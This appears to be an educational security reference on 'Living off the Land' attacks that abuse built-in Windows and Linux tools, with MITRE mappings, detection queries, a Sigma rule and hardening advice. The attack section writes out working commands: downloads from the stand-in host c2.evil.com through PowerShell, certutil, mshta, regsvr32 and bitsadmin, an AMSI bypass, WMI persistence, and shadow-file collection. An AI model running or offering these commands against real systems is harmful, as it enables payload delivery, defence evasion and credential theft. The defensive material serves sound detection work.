Living off the Land (LotL) - LOLBins and LOLBas

Summary: "Living off the Land" (LotL) refers to attack techniques in which attackers use only legitimate tools and utilities already present on the system (LOLBins = Living off the Land Binaries) instead of their own malware. By using PowerShell, WMI, certutil, regsvr32, mshta, and other built-in Windows tools, attackers evade antivirus detection and make forensic attribution more difficult. MITRE ATT&CK; T1218 (System Binary Proxy Execution).

Living off the Land is the stealth concept used by modern attackers: no custom malware that could be detected—instead, exploiting the operating system against itself. PowerShell is a command-line interpreter for administrators—and for attackers. certutil is a certificate management tool—and a downloader. WMI is a management interface—and a persistence technique. LOLBins turn every Windows computer into a potential attacker’s tool.

LOLBins – Living off the Land Binaries

Known LOLBins and their potential uses:

PowerShell (powershell.exe / pwsh.exe):
  MITRE: T1059.001
  Intended purpose: Scripting, administration
  Exploitation:
    # Encoded Command (Base64) – avoids logging:
    powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0AC...
    # = Invoke-WebRequest http://c2.evil.com/payload.exe -OutFile shell.exe

    # AMSI bypass:
    [Ref].Assembly.GetType(&#x27;System.Management.Automation.AmsiUtils&#x27;)|
      ?{$_}|%{$_.GetField(&#x27;amsiInitFailed&#x27;,&#x27;NonPublic,Static&#x27;).SetValue($null,$true)}

    # PowerShell Remoting for lateral movement:
    Invoke-Command -ComputerName DC01 -ScriptBlock {whoami}
    Enter-PSSession -ComputerName FileServer01

    # Download + Execute (without file on disk):
    IEX (New-Object Net.WebClient).DownloadString(&#x27;http://c2.evil.com/payload.ps1&#x27;)

WMI (Windows Management Instrumentation):
  MITRE: T1047
  Legitimate Purpose: Hardware queries, software management
  Exploitation:
    # Remote Process Execution:
    wmic /node:192.168.1.10 /user:domain\admin /password:Pass123
      process call create &quot;cmd.exe /c calc.exe&quot;

    # Persistence via WMI Event Subscription:
    # (Starts on system events – survives reboots!)
    wmic /namespace:&quot;\\root\subscription&quot; path __EventFilter
      create Name=&quot;PersistFilter&quot;, EventNamespace=&quot;root\cimv2&quot;,
      QueryLanguage=&quot;WQL&quot;, Query=&quot;SELECT * FROM Win32_ModuleLoadTrace&quot;

CertUtil (certutil.exe):
  MITRE: T1105 (Ingress Tool Transfer)
  Normal purpose: Certificate management, PKI
  Misuse:
    # Download files (bypasses simple proxy filters!):
    certutil.exe -urlcache -split -f &quot;http://c2.evil.com/payload.exe&quot; payload.exe

    # Base64 decoding:
    certutil.exe -decode encoded.txt payload.exe
    # (Attacker delivers Base64-encoded payload as a .txt file)

    # Clearing the URL cache (covering tracks):
    certutil.exe -urlcache -split -f &quot;http://c2.evil.com/payload.exe&quot; delete

MSHta (mshta.exe):
  MITRE: T1218.005
  Normal purpose: HTML Application Host (HTA files)
  Abuse:
    # Execute remote HTA:
    mshta.exe &quot;http://c2.evil.com/evil.hta&quot;
    # HTA = HTML + VBScript/JScript → full script access!

    # Phishing: &quot;Please open the HTA file&quot; instead of .exe → often not blocked

regsvr32 (regsvr32.exe):
  MITRE: T1218.010
  Normal purpose: Register COM objects
  Abuse (Squiblydoo):
    # Load and execute a remote COM object:
    regsvr32.exe /s /n /u /i:&quot;http://c2.evil.com/evil.sct&quot; scrobj.dll
    # → SCT file contains JScript/VBScript
    # → regsvr32 is signed by Microsoft → often bypasses AppLocker!

rundll32 (rundll32.exe):
  MITRE: T1218.011
  Normal purpose: Call DLL function
  Abuse:
    # Load URL to JavaScript as a DLL:
    rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;...
    # Execute custom DLL:
    rundll32.exe C:\Users\Public\evil.dll,EntryPoint

wscript / cscript:
  MITRE: T1059.005
  Normal purpose: Execute VBScript/JScript
  Abuse:
    wscript.exe //B &quot;\\share\payload.vbs&quot;  # Silent mode, no dialogs

BitsAdmin (bitsadmin.exe):
  MITRE: T1197
  Normal Purpose: Background Intelligent Transfer Service (Windows Update)
  Abuse:
    # Download:
    bitsadmin /transfer &quot;WindowsUpdate&quot; /download /priority high
      &quot;http://c2.evil.com/payload.exe&quot; &quot;C:\Windows\Temp\payload.exe&quot;
    # Persistence: BITS jobs survive reboots!

LOLBas - Living off the Land-Based Scripts

Beyond Binaries - Scripts and Built-in Features:

Excel/Office Macros (MITRE T1566.001):
  → Phishing: .xlsm, .docm attachment with macro
  → Macro: certutil download + PowerShell execute
  → Modern: also possible in ODF, LibreOffice

Outlook Home Page Attack:
  → Registry: Set Outlook home page to evil.com
  → Persistence: Website loads every time Outlook starts

DLL Hijacking:
  → Legitimate application loads DLL from an insecure path
  → Attacker places their own DLL in the desired location
  → Application loads attacker’s DLL (self-signing not required!)

LOLBAS Reference:
  → lolbas-project.github.io: complete list of all known LOLBins
  → 250+ documented Windows binaries with exploitation examples
  → Categories: Execute, Download, Upload, Compile, Copy, Decode

GTFOBins (Linux equivalent):
  → gtfobins.github.io: LOLBins for Linux
  → SUID exploitation, Sudo escape, capability usage

  Examples:
    # awk as a shell:
    awk &#x27;BEGIN {system(&quot;/bin/sh&quot;)}&#x27;

    # tar for file exfiltration:
    tar -cf /tmp/loot.tar /etc/shadow

    # Python for reverse shell:
    python3 -c &#x27;import socket,os,pty;s=socket.socket(...)&#x27;

Detection of LotL attacks

How EDR/SIEM detects LotL attacks:

Enable PowerShell logging:
  # Group Policy: Computer Configuration → Administrative Templates → Windows Components → PowerShell
  Turn on Module Logging:                   ENABLED (all commands)
  Turn on PowerShell Script Block Logging:  ENABLED (including obfuscated scripts)
  Turn on Transcription:                    ENABLED (everything in log file)

  # Event Log: Microsoft-Windows-PowerShell/Operational
  # Event ID 4104: Script Block Logging (the actual command content)
  # Event ID 4103: Module Logging

  # Suspicious PowerShell patterns (Sentinel KQL):
  SecurityEvent
  | where EventID == 4104
  | where ScriptBlockText contains_any
    (&quot;FromBase64String&quot;, &quot;IEX&quot;, &quot;Invoke-Expression&quot;,
     &quot;DownloadString&quot;, &quot;WebClient&quot;, &quot;AmsiUtils&quot;,
     &quot;Bypass&quot;, &quot;HideWindow&quot;, &quot;EncodedCommand&quot;)
  | project TimeGenerated, Computer, ScriptBlockText

WMI Monitoring:
  # Sysmon Event ID 19-21: WMI Event Subscription
  # Event ID 20: WMI EventFilter + Consumer: Persistence!
  Get-WMIObject -Namespace &quot;root\subscription&quot; -Class __EventFilter
  # → If there are unknown filters: Investigate!

Sigma rule for LotL:
  title: Living off the Land - CertUtil Download
  id: xxx
  status: stable
  description: CertUtil used for file download (LOLBin abuse)
  logsource:
    category: process_creation
    product: windows
  detection:
    selection:
      Image|endswith: &#x27;\certutil.exe&#x27;
      CommandLine|contains:
        - &#x27;-urlcache&#x27;
        - &#x27;-split&#x27;
        - &#x27;http&#x27;
    condition: selection
  level: medium
  tags:
    - attack.ingress_tool_transfer
    - attack.t1105

EDR Detection Mechanisms:
  → Behavioral Detection: PowerShell → Network → Exec → Persistence = Suspicious!
  → Process Tree: Word.exe → powershell.exe → curl.exe → SUSPICIOUS
  → Script Analysis: PowerShell script block is checked against patterns
  → API Monitoring: Suspicious API calls (VirtualAlloc + WriteProcessMemory)
  → Parent-Child Anomalies: Excel spawns cmd.exe → ALERT!

Hardening against LotL:
  □ PowerShell: Enforce Constrained Language Mode
    [System.Management.Automation.PSConstrainedLanguageMode]::Enter()
    # Drastically limits PowerShell capabilities

  □ WDAC (Windows Defender Application Control):
    → Run only signed applications (AppLocker successor)
    → LOLBins can be explicitly blocked (e.g., mshta.exe)

  □ Attack Surface Reduction (ASR) Rules (Microsoft Defender):
    Block abuse of exploited vulnerable signed drivers
    Block credential theft from LSASS
    Block Office applications from spawning child processes
    Block execution of potentially obfuscated scripts

  □ Logging: Enable Script Block Logging + Process Command Line Logging
  □ Monitoring: EDR with behavioral detection (CrowdStrike, Defender for Endpoint)